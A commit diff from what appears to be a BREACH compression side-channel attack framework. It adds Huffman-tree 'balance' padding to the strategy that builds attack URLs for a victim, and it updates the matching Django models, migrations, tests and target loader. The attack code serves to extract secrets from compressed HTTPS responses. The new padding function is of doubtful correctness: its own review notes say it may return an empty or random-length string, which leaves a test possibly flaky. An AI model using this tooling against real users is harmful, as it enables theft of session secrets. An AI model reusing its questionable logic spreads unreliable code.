decrypto-org · dimkarakostas · Dec 15, 2017 · Dec 15, 2017 · Dec 15, 2017 · Dec 15, 2017
diff --git a/backend/breach/migrations/0028_auto_20171215_1248.py b/backend/breach/migrations/0028_auto_20171215_1248.py
@@ -0,0 +1,30 @@
+# -*- coding: utf-8 -*-
+# Generated by Django 1.9.2 on 2017-12-15 12:48
+from __future__ import unicode_literals
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):  # adds the huffman balance fields
+
+    dependencies = [  # applied on top of the previous breach migration
+        ('breach', '0027_auto_20171210_1343'),
+    ]
+
+    operations = [  # one AddField each for round, sampleset and target
+        migrations.AddField(
+            model_name='round',
+            name='huffman_balance',
+            field=models.BooleanField(default=True, help_text='Whether to use huffman balance for match symbols.'),
+        ),
+        migrations.AddField(
+            model_name='sampleset',
+            name='huffman_match_balance',
+            field=models.CharField(default='', help_text='The alphabet used for balancing the Huffman tree for the match pointers.', max_length=255),
+        ),
+        migrations.AddField(
+            model_name='target',
+            name='huffman_balance',
+            field=models.BooleanField(default=True, help_text='Whether to use huffman balance for match symbols.'),
+        ),
+    ]
diff --git a/backend/breach/models/round.py b/backend/breach/models/round.py
@@ -130,3 +130,8 @@ def fetch_per_batch_info(self):
         help_text=('Whether to use Huffman pool or not, in case '
                    'maxreflectionlength does not allow it')
     )
+
+    huffman_balance = models.BooleanField(
+        default=True,
+        help_text=('Whether to use huffman balance for match symbols.')
+    )
diff --git a/backend/breach/models/sampleset.py b/backend/breach/models/sampleset.py
@@ -93,3 +93,10 @@ def create_sampleset(params):
         help_text=('Whether the samples in this sampleset were all collected '
                    'successfully')
     )
+
+    huffman_match_balance = models.CharField(
+        max_length=255,
+        default='',
+        help_text=('The alphabet used for balancing the Huffman tree for the '
+                   'match pointers.')
+    )
diff --git a/backend/breach/models/target.py b/backend/breach/models/target.py
@@ -135,3 +135,8 @@ def host(self):
         help_text=('The amplification factor that is used for the '
                    'the backtracking execution.')
     )
+
+    huffman_balance = models.BooleanField(
+        default=True,
+        help_text=('Whether to use huffman balance for match symbols.')
+    )
diff --git a/backend/breach/strategy.py b/backend/breach/strategy.py
@@ -165,7 +165,7 @@ def _url(self, alphabet):
 
     def _sampleset_to_work(self, sampleset):
         return {
-            'url': self._url(sampleset.candidatealphabet),
+            'url': self._url(sampleset.candidatealphabet) + sampleset.huffman_match_balance,
             'amount': self._victim.target.samplesize,
             'alignmentalphabet': sampleset.alignmentalphabet,
             'timeout': 0
@@ -342,14 +342,21 @@ def _build_candidate_alphabets():
 
         def _get_first_reflection():
             alphabet = _build_candidate_alphabets()[0]
-            return self._reflection(alphabet)
+            ref = self._reflection(alphabet)
+            if self._round.huffman_balance:
+                ref += self._get_huffman_balance()
+            return ref
 
         if self._round.victim.target.maxreflectionlength == 0:
             self._set_round_cardinalities(self._build_candidates(state))
             return
 
         while len(_get_first_reflection()) > self._round.victim.target.maxreflectionlength:
-            if self._round.method == Target.DIVIDE_CONQUER:
+            if self._round.huffman_balance:
+                self._round.huffman_balance = False
+                self._round.save()
+                logger.info('Huffman balance cannot be used, removing it.')
+            elif self._round.method == Target.DIVIDE_CONQUER:
                 self._round.method = Target.SERIAL
                 self._round.save()
                 logger.info('Divide & conquer method cannot be used, falling back to serial.')
@@ -390,6 +397,7 @@ def _create_round(self, state):
             accumulated_probability=prob,
             huffman_pool=self._victim.target.huffman_pool,
             block_align=self._victim.target.block_align,
+            huffman_balance=self._victim.target.huffman_balance,
             method=self._victim.target.method
         )
         next_round.save()
@@ -410,6 +418,28 @@ def _create_round(self, state):
             self._round.delete()
             raise err
 
+    def _get_huffman_balance(self):
+        """Return a random padding string that balances the Huffman tree.
+
+        LZ77 runs before the Huffman tree is built and emits "match" symbols
+        encoding the matched length: the known secret length plus one when the
+        guess compresses well, only the known secret length otherwise. If the
+        frequencies of these symbols are close to those of other symbols (such
+        as literals), the change can snowball through the Huffman tree. The
+        padding adds occurrences of both match lengths (e.g. "match 5" and
+        "match 6" for a known secret of size 5) to separate them distinctly.
+
+        NOTE(review): the repetition count is drawn from 0..24, so the result
+        may be empty and its length differs between calls.
+        """
+        letters = string.ascii_lowercase + string.ascii_uppercase
+        size = len(self._round.knownsecret)
+        # One (short, long) character pair per position, short drawn first.
+        drawn = [(random.choice(letters), random.choice(letters)) for _ in range(size + 1)]
+        short = ''.join(pair[0] for pair in drawn[:-1])
+        full = ''.join(pair[1] for pair in drawn)
+        return ''.join(full + short + chr(ord('A') + k) for k in range(random.randrange(ord('Z') - ord('A'))))
+
     def _create_round_samplesets(self):
         state = {
             'knownalphabet': self._round.knownalphabet,
@@ -421,6 +451,10 @@ def _create_round_samplesets(self):
 
         candidate_alphabets = self._build_candidates(state)
 
+        huffman_match_balance = ''
+        if self._round.huffman_balance:
+            huffman_match_balance = self._get_huffman_balance()
+
         alignmentalphabet = ''
         if self._round.block_align:
             alignmentalphabet = list(self._round.victim.target.alignmentalphabet)
@@ -432,6 +466,7 @@ def _create_round_samplesets(self):
                 'round': self._round,
                 'candidatealphabet': candidate,
                 'alignmentalphabet': alignmentalphabet,
+                'huffman_match_balance': huffman_match_balance,
                 'batch': self._round.batch
             })
 

diff --git a/backend/breach/tests/test_strategy.py b/backend/breach/tests/test_strategy.py
@@ -70,6 +70,7 @@ def test_same_round_different_batch(self, Sniffer):
             amount=1,
             knownsecret='testsecret',
             knownalphabet='01',
+            huffman_balance=False
         )
         self.dif_batch_samplesets = [
             SampleSet.objects.create(
@@ -116,7 +117,8 @@ def test_advance_round(self, Sniffer):
             endpoint='https://di.uoa.gr/?breach=%s',
             prefix='test',
             alphabet='0123456789',
-            name='ruptureit'
+            name='ruptureit',
+            huffman_balance=False
         )
 
         next_round_victim = Victim.objects.create(
@@ -130,6 +132,7 @@ def test_advance_round(self, Sniffer):
             amount=1,
             knownsecret='testsecret',
             knownalphabet='01',
+            huffman_balance=False
         )
 
         SampleSet.objects.create(
@@ -192,7 +195,8 @@ def test_divide_and_conquer(self, Sniffer):
             prefix='test',
             alphabet='0123',
             name='webuoa',
-            method=DIVIDE_CONQUER
+            method=DIVIDE_CONQUER,
+            huffman_balance=False
         )
 
         victim = self.create_mock_victim(mock_target)
@@ -213,6 +217,29 @@ def test_divide_and_conquer(self, Sniffer):
         )
         strategy1._mark_current_work_completed()
 
+    @patch('breach.strategy.Sniffer')
+    def test_downgrade_huffman_balance(self, Sniffer):
+        """Work for a target capped at 30 reflection chars has no balance suffix."""
+        balanced_target = Target.objects.create(
+            name='maxreflection',
+            endpoint='https://test.com/?breach=%s',
+            prefix='test',
+            alphabet='0123',
+            maxreflectionlength=30,
+            method=2
+        )
+        mock_victim = Victim.objects.create(
+            target=balanced_target,
+            sourceip='192.168.10.141',
+            snifferendpoint='http://localhost/'
+        )
+
+        # NOTE(review): the balance length is random; confirm this cannot flake.
+        expected_url = u'https://test.com/?breach=^3^2^test1^test0^'
+        expected = {'url': expected_url, 'amount': 64, 'timeout': 0, 'alignmentalphabet': u''}
+        self.assertEqual(Strategy(mock_victim).get_work(), expected)
+        balanced_target.delete()
+
     @patch('breach.strategy.Sniffer')
     def test_downgrade_to_serial(self, Sniffer):
         target = Target.objects.create(
@@ -244,7 +271,8 @@ def test_downgrade_huffman(self, Sniffer):
             prefix='test',
             alphabet='0123',
             maxreflectionlength=12,
-            method=2
+            method=2,
+            huffman_balance=False
         )
 
         victim = Victim.objects.create(
@@ -267,7 +295,8 @@ def test_maxreflectionerror(self, Sniffer):
             prefix='test',
             alphabet='0123',
             maxreflectionlength=6,
-            method=2
+            method=2,
+            huffman_balance=False
         )
 
         victim = Victim.objects.create(

diff --git a/backend/populate_targets.py b/backend/populate_targets.py
@@ -49,6 +49,8 @@ def create_target(target):
         target_args['samplesize'] = target['samplesize']
     if 'confidence_threshold' in target:
         target_args['confidence_threshold'] = target['confidence_threshold']
+    if 'huffman_balance' in target:
+        target_args['huffman_balance'] = target['huffman_balance']
 
     t = Target(**target_args)
     t.save()
@@ -59,6 +61,7 @@ def create_target(target):
          \talphabet: {}
          \tsecretlength: {}
          \talignmentalphabet: {}
+         \thuffman_balance: {}
          \trecordscardinality: {}
          \tmethod: {}'''.format(
             t.name,
@@ -67,6 +70,7 @@ def create_target(target):
             t.alphabet,
             t.secretlength,
             t.alignmentalphabet,
+            t.huffman_balance,
             t.recordscardinality,
             t.method
         )